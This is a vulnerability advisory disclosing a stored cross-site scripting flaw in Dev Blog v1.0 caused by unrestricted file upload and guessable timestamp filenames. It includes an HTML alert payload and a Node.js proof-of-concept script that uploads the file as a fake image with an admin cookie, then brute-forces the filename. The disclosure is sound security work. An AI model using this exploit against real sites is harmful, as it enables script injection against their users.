Dev Blog v1.0 - Stored XSS
Summary
Name | Dev Blog v1.0 - Stored cross site scripting |
Code name | |
Product | Dev Blog |
Affected versions | v1.0 |
State | Public |
Release date | 2023-04-10 |
Vulnerability
Kind | Stored cross-site scripting (Stored XSS) |
Rule | |
Remote | Yes |
CVSSv3.1 Vector | CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:L |
CVSSv3.1 Base Score | 6.4 |
Exploit available | Yes |
CVE ID(s) |
Description
Dev blog v1.0 allows to exploit an XSS through an unrestricted file upload, together with a bad entropy of filenames. With this an attacker can upload a malicious HTML file, then guess the filename of the uploaded file and send it to a potential victim.
Vulnerability
A Stored cross-Site scripting (XSS) vulnerability has been identified in Dev blog, which allows an attacker to attacker to execute arbitrary JS code in the browser of any user of the application.
Exploit
exploit.html
<script>
alert(1)
</script>
exploit.js
const FormData = require('form-data');
const axios = require('axios');
const fs = require('fs');
const url = 'http://127.0.0.1:3000/admin/add';
const formData = new FormData();
formData.append('title', 'junk');
formData.append('subtitle', 'junk');
formData.append('image', fs.createReadStream('./exploit.html'), {
filename: 'exploit.html',
contentType: 'image/jpeg'
});
formData.append('content', 'junk');
const config = {
headers: {
...formData.getHeaders(),
'Content-Length': formData.length,
'Cookie': 'user=admin',
},
};
initialDate = Date.now()
axios.post(url, formData, config)
.then((response) => {
endDate = Date.now()
const baseUrl = 'http://127.0.0.1:3000/images/';
const fileExtension = '.html';
for (let currentTime = initialDate; currentTime <= endDate; currentTime += 1) {
const badUrl = `${baseUrl}${currentTime}${fileExtension}`;
fetch(badUrl)
.then(response => {
if (response.ok) {
console.log("The file name is: " + badUrl);
}
})
}
})
Evidence of exploitation
Our security policy
We have reserved the ID CVE-2023-6142 to refer to this issue from now on.
System Information
-
Version: Dev Blog v1.0
-
Operating System: MacOS
Mitigation
There is currently no patch available for this vulnerability.
Credits
The vulnerability was discovered by Carlos Bello from Fluid Attacks' Offensive Team.
References
Vendor page https://github.com/Armanidrisi/devblog/
Timeline
2023-11-14
Vulnerability discovered.
2023-11-14
Vendor contacted.
2023-11-14
Vendor Confirmed the vulnerability.
2023-11-15
Public Disclosure.